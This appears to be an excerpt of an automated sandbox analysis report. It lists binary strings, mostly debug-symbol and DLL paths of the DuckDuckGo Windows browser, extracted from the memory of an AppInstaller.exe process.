Source: Binary string: WindowsBrowser/DuckDuckGo.Windows.pdbcomImages/Wide310x150Logo.scale-100.pngWindowsBrowser/DuckDuckGo.WebView.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.CrashHandler.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: s.pdb source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: er.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.WINDOWS.PDB source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/NetworkProtection.Grpc.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Autocomplete.Public.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: application/x-msdownloado.pdb source: AppInstaller.exe, 00000008.00000002.3032102117.0000019EC947F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Bookmarks.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.CrashReporter.pdbdbWindowsBrowser/WindowsBrowser.Autocomplete.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.DataBrokerProtection.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: DB/WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.WEBVIEW2.PDBP| source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ic.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GE.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: |/WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdbx/WindowsBrowser/pl/System.Private.ServiceModel.resources.dllhttp://www.example.com/WindowsBrowser/Nito.Collections.Deque.dllng source: AppInstaller.exe, 00000008.00000002.3031274677.0000019EC92F1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ge.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.DataBrokerProtection.pdbed.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: DB/WINDOWSBROWSER/DUCKDUCKGO.CRASHREPORTER.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: O.PDB source: AppInstaller.exe, 00000008.00000002.3034286415.0000019EC9823000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.UserPreferences.Public.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /IMAGES/SQUARE44X44LOGO.ALTFORM-UNPLATED_TARGETSIZE-32.PNG/WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdb source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.SecureStorage.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Common.Wpf.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Privacy.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.UPDATER.PDB@Q source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.Windows.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WEBVIEW2/MSEDGEWEBVIEW2.EXE.SIG/WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.WEBVIEW2.PDB/WindowsBrowser/WebView2/vk_swiftshader.dllPAK/WINDOWSBROWSER/WEBVIEW2/LEARNING_TOOLS.DLLll/WindowsBrowser/WindowsBrowser.Styles.pdb.SIG/WindowsBrowser/WindowsBrowser.Autocomplete.pdb/Images/Square44x44Logo.targetsize-48.pngT.PAK/WINDOWSBROWSER/WEBVIEW2/WNS_PUSH_CLIENT.DLLL source: AppInstaller.exe, 00000008.00000002.3034535563.0000019EC9870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.STYLES.PDB/WindowsBrowser/WindowsBrowser.Common.Wpf.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.NETWORKPROTECTION.PDBl/WindowsBrowser/WindowsBrowser.NetworkProtection.pdbL source: AppInstaller.exe, 00000008.00000002.3035019047.0000019EC9992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.pdbPDB/WindowsBrowser/WindowsBrowser.UserPreferences.pdbBL/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.dllon source: AppInstaller.exe, 00000008.00000002.3035019047.0000019EC9992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.WebView.pdb/WindowsBrowser/Themes/Dark.xaml/IMAGES/WIDE310X150LOGO.SCALE-400.PNG/WindowsBrowser/Themes/Light.xaml source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PUBLIC.XML/WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PUBLIC.PDB/WINDOWSBROWSER/PROTOBUF-NET.GRPC.ASPNETCORE.DLLdllL/WindowsBrowser/protobuf-net.Grpc.AspNetCore.dlldlll source: AppInstaller.exe, 00000008.00000002.3035019047.0000019EC9992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: T/WindowsBrowser/WindowsBrowser.Burning.pdb/WindowsBrowser/WindowsBrowser.Privacy.dlllll source: AppInstaller.exe, 00000008.00000002.3031891318.0000019EC9443000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Bookmarks.pdbpdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.WebView.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.WEBVIEW2.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: o.pdb source: AppInstaller.exe, 00000008.00000002.3034286415.0000019EC9823000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3034989049.0000019EC9981000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Common.Wpf.pdb/WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PDB/WindowsBrowser/WindowsBrowser.Bookmarks.pdbDB/WindowsBrowser/WindowsBrowser.Autocomplete.pdbPm source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: J/WindowsBrowser/Xiejiang.SKLottie.dll/WindowsBrowser/WindowsBrowser.Common.Wpf.pdbl source: AppInstaller.exe, 00000008.00000002.3030813390.0000019EC9258000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: N/WindowsBrowser/DuckDuckGo.VPN.Tray.pdbR/WindowsBrowser/Microsoft.Data.Sqlite.dll/WindowsBrowser/WPFLocalizeExtension.dllll source: AppInstaller.exe, 00000008.00000002.3031891318.0000019EC9443000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Burning.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TE.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: owser.CrashReporting.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdb/WINDOWSBROWSER/WINDOWSBROWSER.USERPREFERENCES.PUBLIC.PDB.pdb/WindowsBrowser/DuckDuckGo.CrashReporter.runtimeconfig.jsonDB/WINDOWSBROWSER/WEBVIEW2/EXTENSIONS/EXTERNAL_EXTENSIONS.JSONTA/IMAGES/SQUARE44X44LOGO.ALTFORM-UNPLATED_TARGETSIZE-48.PNG.png source: AppInstaller.exe, 00000008.00000002.3034817725.0000019EC991D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.VPN.Tray.pdb@Q source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: db/WindowsBrowser/DuckDuckGo.WebView.WebView2.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.Updater.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ed.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.VPN.TRAY.PDB/WindowsBrowser/DuckDuckGo.Updater.pdb source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.SecureStorage.pdb source: AppInstaller.exe, 00000008.00000002.3033983146.0000019EC9789000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.pdb/WindowsBrowser/WindowsBrowser.SecureStorage.dllb source: AppInstaller.exe, 00000008.00000002.3031987702.0000019EC946B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: X/WindowsBrowser/DuckDuckGo.CrashReporter.pdbb/WindowsBrowser/tr/PresentationCore.resources.dll/WindowsBrowser/WindowsBrowser.SecureStorage.dll source: AppInstaller.exe, 00000008.00000002.3031987702.0000019EC946B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.NetworkProtection.pdb/WINDOWSBROWSER/WINDOWSBROWSER.CRASHREPORTING.PDB/WindowsBrowser/WindowsBrowser.UserPreferences.pdbbB source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: w2.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.UserPreferences.pdbb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.WebView.WebView2.pdbImages/Wide310x150Logo.scale-150.pngWindowsBrowser/WindowsBrowser.Common.pdb2.PDB source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: DB/WINDOWSBROWSER/WINDOWSBROWSER.STYLES.PDBP source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Bookmarks.pdb/WINDOWSBROWSER/WINDOWSBROWSER.BOOKMARKS.PDB/WindowsBrowser/WindowsBrowser.Bookmarks.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.BOOKMARKS.PDBdb/IMAGES/SQUARE44X44LOGO.TARGETSIZE-32.PNG.dll/WindowsBrowser/WebView2/eventlog_provider.dll/IMAGES/SQUARE44X44LOGO.TARGETSIZE-256.PNG.sig/WindowsBrowser/WindowsBrowser.Common.pdb2.pdb/Images/Square44x44Logo.targetsize-256.png/Images/Square44x44Logo.targetsize-24.pnge/WINDOWSBROWSER/WINDOWSBROWSER.COMMON.WPF.PDBb source: AppInstaller.exe, 00000008.00000002.3034535563.0000019EC9870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.BURNING.PDB/WindowsBrowser/DuckDuckGo.CrashReporter.pdbdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.USERPREFERENCES.PUBLIC.PDB/WindowsBrowser/System.DirectoryServices.AccountManagement.dll source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.CrashReporting.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: DB/WindowsBrowser/WindowsBrowser.CrashHandler.pdb/WindowsBrowser/DuckDuckGo.CrashReporter.pdb/WindowsBrowser/WindowsBrowser.CrashHandler.pdb/WINDOWSBROWSER/WINDOWSBROWSER.BURNING.PDB/WINDOWSBROWSER/WINDOWSBROWSER.CRASHHANDLER.PDB/WindowsBrowser/WindowsBrowser.CrashHandler.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/SYSTEM.DIRECTORYSERVICES.ACCOUNTMANAGEMENT.DLL/WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdb/WINDOWSBROWSER/SYSTEM.SECURITY.CRYPTOGRAPHY.ENCODING.DLLles/Images/Square44x44Logo.targetsize-24_altform-unplated.png/WINDOWSBROWSER/DUCKDUCKGO.CRASHREPORTER.RUNTIMECONFIG.JSONdb/WINDOWSBROWSER/GRPC.ASPNETCORE.SERVER.CLIENTFACTORY.DLLON/IMAGES/SQUARE44X44LOGO.TARGETSIZE-24_ALTFORM-UNPLATED.PNG/WINDOWSBROWSER/DUCKDUCKGO.CRASHREPORTER.RUNTIMECONFIG.JSONdb/WindowsBrowser/Grpc.AspNetCore.Server.ClientFactory.dllON/WINDOWSBROWSER/WINDOWSBROWSER.DATABROKERPROTECTION.SHARED.PDB/WindowsBrowser/WindowsBrowser.UserPreferences.Public.pdb.PDB/WINDOWSBROWSER/WINDOWSBROWSER.USERPREFERENCES.PUBLIC.PDB/WINDOWSBROWSER/WINDOWSBROWSER.DATABROKERPROTECTION.SHARED.PDB/WindowsBrowser/WindowsBrowser.UserPreferences.Public.pdb.PDB/WINDOWSBROWSER/WINDOWSBROWSER.DATABROKERPROTECTION.SHARED.PDB/WINDOWSBROWSER/WINDOWSBROWSER.USERPREFERENCES.PUBLIC.PDB/WindowsBrowser/DuckDuckGo.CrashReporter.runtimeconfig.jsonDB/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.deps.jsonON/WINDOWSBROWSER/DUCKDUCKGO.PERSONALINFOREMOVAL.DEPS.JSON source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.WebView.WebView2.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: `/WindowsBrowser/Microsoft.Win32.SystemEvents.dll\/WindowsBrowser/Microsoft.WSMan.Management.dll^/WindowsBrowser/WindowsBrowser.CrashHandler.pdb`/WindowsBrowser/Microsoft.AspNetCore.Routing.dllb/WindowsBrowser/ja/PresentationCore.resources.dll/WindowsBrowser/WindowsBrowser.Sync.Crypto.Managed.dll source: AppInstaller.exe, 00000008.00000002.3031987702.0000019EC946B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Burning.pdb.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d/WindowsBrowser/WebView2/delegatedWebFeatures.sccdZ/WindowsBrowser/Nito.AsyncEx.Coordination.dlld/WindowsBrowser/PresentationFramework.AeroLite.dll\/WindowsBrowser/Polly.Contrib.WaitAndRetry.dllf/WindowsBrowser/PresentationFramework-SystemXml.dlld/WindowsBrowser/WindowsBrowser.UserPreferences.pdb^/WindowsBrowser/PresentationFramework.Aero2.dll/WindowsBrowser/WindowsBrowser.UserPreferences.dllg source: AppInstaller.exe, 00000008.00000002.3031987702.0000019EC946B000.00000004.00000020.00020000.00000000.sdmp
